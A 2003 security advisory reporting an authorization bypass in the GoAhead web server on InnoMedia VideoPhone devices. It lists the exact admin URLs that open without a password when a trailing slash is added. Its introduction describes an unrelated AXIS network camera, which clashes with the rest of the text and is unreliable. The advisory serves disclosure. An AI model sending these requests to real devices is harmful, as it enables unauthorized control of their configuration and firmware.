InnoMedia VideoPhone Authorization Bypass

2004-03-01T00:00:00
ID SECURITYVULNS:DOC:5852
Type securityvulns
Reporter Securityvulns
Modified 2004-03-01T00:00:00

Description

Application: InnoMedia VideoPhone Server: GoAhead-Webs Vendors: InnoMedia Pte Ltd GoAhead Ltd http://www.innomedia.com/ http://www.goahead.com/ Versions: au75200xvi04010x Platforms: Windows Bug: Authorization Bypass Risk: High Exploitation: remote with browser Date: 25 Dec 2003 Author: Rafel Ivgi, The-Insider e-mail: the_insider@mail.com web: http://theinsider.deep-ice.com

1) Introduction 2) Bugs 3) The Code

=============== 1) Introduction ===============

The AXIS 2100 Network Camera offers crisp, quality images and streaming video from anywhere on your network. It lets you keep a close eye on the world around you, or show your part of it through the Web.

With a built-in high performance Web server, no PC is required. The network camera can operate as a standalone or be placed wherever there is a LAN or Internet connection, or an available modem.

====== 2) Bug ======

Browsing the server normally http://<host>/ Will show some info about the server. The server's menu appears on the left side and contains a few links to protected files, which setup the server's settings/configuration. When refering to any of the menu's "protected" links, such as: http://<host>/videophone_admindetail.asp A "Basic Authorization" request pops up. This authorization can be easily bypassed by refering to the same file as a folder. http://<host>/videophone_admindetail.asp/

=========== 3) The Code ===========

http://<host>/videophone_admindetail.asp/ http://<host>/videophone_syscfg.asp/ http://<host>/videophone_upgrade.asp/ http://<host>/videophone_sysctrl.asp/


Rafel Ivgi, The-Insider http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."